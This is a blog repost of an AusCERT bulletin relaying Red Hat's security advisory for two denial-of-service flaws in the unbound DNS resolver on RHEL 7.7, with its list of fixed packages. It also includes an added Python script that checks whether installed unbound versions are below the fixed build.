Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-12663 CVE-2020-12662 

Reference:         ESB-2020.2336
                   ESB-2020.2163

Original Bulletin: 
   https://access.redhat.com/errata/RHSA-2020:4181

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: unbound security update
Advisory ID:       RHSA-2020:4181-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2020:4181
Issue date:        2020-10-06
CVE Names:         CVE-2020-12662 CVE-2020-12663 
=====================================================================

1. Summary:

An update for unbound is now available for Red Hat Enterprise Linux 7.7
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7) - x86_64
Red Hat Enterprise Linux Server EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional EUS (v. 7.7) - ppc64, ppc64le, s390x, x86_64

3. Description:

The unbound packages provide a validating, recursive, and caching DNS or
DNSSEC resolver. 

Security Fix(es):

* unbound: amplification of an incoming query into a large number of
queries directed to a target (CVE-2020-12662)

* unbound: infinite loop via malformed DNS answers received from upstream
servers (CVE-2020-12663)

For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1837597 - CVE-2020-12662 unbound: amplification of an incoming query into a large number of queries directed to a target
1837604 - CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers

6. Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.7):

Source:
unbound-1.6.6-2.el7_7.src.rpm

x86_64:
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-libs-1.6.6-2.el7_7.i686.rpm
unbound-libs-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.7):

x86_64:
unbound-1.6.6-2.el7_7.x86_64.rpm
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-devel-1.6.6-2.el7_7.i686.rpm
unbound-devel-1.6.6-2.el7_7.x86_64.rpm
unbound-python-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.7):

Source:
unbound-1.6.6-2.el7_7.src.rpm

ppc64:
unbound-1.6.6-2.el7_7.ppc64.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64.rpm
unbound-libs-1.6.6-2.el7_7.ppc.rpm
unbound-libs-1.6.6-2.el7_7.ppc64.rpm

ppc64le:
unbound-1.6.6-2.el7_7.ppc64le.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64le.rpm
unbound-libs-1.6.6-2.el7_7.ppc64le.rpm

s390x:
unbound-1.6.6-2.el7_7.s390x.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390x.rpm
unbound-libs-1.6.6-2.el7_7.s390.rpm
unbound-libs-1.6.6-2.el7_7.s390x.rpm

x86_64:
unbound-1.6.6-2.el7_7.x86_64.rpm
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-libs-1.6.6-2.el7_7.i686.rpm
unbound-libs-1.6.6-2.el7_7.x86_64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.7):

ppc64:
unbound-debuginfo-1.6.6-2.el7_7.ppc.rpm
unbound-debuginfo-1.6.6-2.el7_7.ppc64.rpm
unbound-devel-1.6.6-2.el7_7.ppc.rpm
unbound-devel-1.6.6-2.el7_7.ppc64.rpm
unbound-python-1.6.6-2.el7_7.ppc64.rpm

ppc64le:
unbound-debuginfo-1.6.6-2.el7_7.ppc64le.rpm
unbound-devel-1.6.6-2.el7_7.ppc64le.rpm
unbound-python-1.6.6-2.el7_7.ppc64le.rpm

s390x:
unbound-debuginfo-1.6.6-2.el7_7.s390.rpm
unbound-debuginfo-1.6.6-2.el7_7.s390x.rpm
unbound-devel-1.6.6-2.el7_7.s390.rpm
unbound-devel-1.6.6-2.el7_7.s390x.rpm
unbound-python-1.6.6-2.el7_7.s390x.rpm

x86_64:
unbound-debuginfo-1.6.6-2.el7_7.i686.rpm
unbound-debuginfo-1.6.6-2.el7_7.x86_64.rpm
unbound-devel-1.6.6-2.el7_7.i686.rpm
unbound-devel-1.6.6-2.el7_7.x86_64.rpm
unbound-python-1.6.6-2.el7_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
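A practical follow-up to the package list above is deciding whether a given host is still on a build older than the fixed one. The script below is an added example, not Red Hat's tooling: it reimplements the rpmvercmp ordering used by RHEL 7's rpm (the newer '^' operator is not implemented), and the installed inventory it checks is a constructed sample of what `rpm -qa --qf '%{NEVRA}\n'` prints.

```python
"""Added example, not Red Hat's tooling: flag installed unbound packages still below
the fixed build in RHSA-2020:4181, ordering versions the way RHEL 7's rpmvercmp does."""
import re

FIXED_EVR = "1.6.6-2.el7_7"          # version-release from the advisory's package list
FIXED_NAMES = {"unbound", "unbound-libs", "unbound-devel", "unbound-python"}
SAMPLE_INVENTORY = [                 # constructed sample of `rpm -qa --qf '%{NEVRA}\n'`
    "unbound-libs-1.6.6-1.el7.x86_64",       # older release: still exposed
    "unbound-1.6.6-2.el7_7.x86_64",          # exactly the fixed build
    "bind-utils-9.11.4-16.P2.el7.x86_64"]    # not covered by this advisory

def rpmvercmp(a, b):
    """-1, 0 or 1 for a < b, a == b, a > b (separators ignored, digits beat letters)."""
    while a or b:
        a, b = (re.sub(r"^[^0-9A-Za-z~]+", "", s) for s in (a, b))  # drop separators
        if a[:1] == "~" or b[:1] == "~":     # '~' sorts below everything, even ''
            if a[:1] != b[:1]:
                return 1 if b[:1] == "~" else -1
            a, b = a[1:], b[1:]
            continue
        if not (a and b):
            break
        isnum = a[0].isdigit()               # a's first char decides the segment type
        sa, sb = (re.match(r"[0-9]*" if isnum else r"[A-Za-z]*", s).group(0) for s in (a, b))
        if not sb:                           # mixed types: the numeric segment is newer
            return 1 if isnum else -1
        a, b = a[len(sa):], b[len(sb):]
        if isnum:                            # numeric: longer after zero-stripping wins
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:                         # same length (or alpha): plain string order
            return 1 if sa > sb else -1
    return 0 if a == b else (1 if a else -1) # whoever has characters left is newer

def evr_cmp(x, y):
    """Compare '[epoch:]version-release' strings: epoch, then version, then release."""
    pat = r"(?:(\d+):)?([^-]+)-(.*)"         # optional epoch, version, release
    (ex, vx, rx), (ey, vy, ry) = (re.match(pat, e).groups() for e in (x, y))
    ex, ey = int(ex or 0), int(ey or 0)
    return (ex > ey) - (ex < ey) or rpmvercmp(vx, vy) or rpmvercmp(rx, ry)

def parse_nevra(nevra):
    name, version, release = nevra.rpartition(".")[0].rsplit("-", 2)  # drop arch, split n-v-r
    return name, f"{version}-{release}"

def still_exposed(inventory=SAMPLE_INVENTORY):
    """NEVRAs covered by the advisory whose EVR is still below the fixed build."""
    return [p for p in inventory if parse_nevra(p)[0] in FIXED_NAMES
            and evr_cmp(parse_nevra(p)[1], FIXED_EVR) < 0]
```

Feed it the real `rpm -qa` output and an empty result means every unbound package on the host is at or above the advisory's build; signature verification of the downloaded RPMs themselves still goes through `rpm -K` with the Red Hat key linked above.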

7. References:

https://access.redhat.com/security/cve/CVE-2020-12662
https://access.redhat.com/security/cve/CVE-2020-12663
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----

The post ESB-2020.3460 – [RedHat] unbound: Denial of service – Remote/unauthenticated appeared first on Malware Devil.

https://malwaredevil.com/2020/10/07/esb-2020-3460-redhat-unbound-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3460-redhat-unbound-denial-of-service-remote-unauthenticated

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...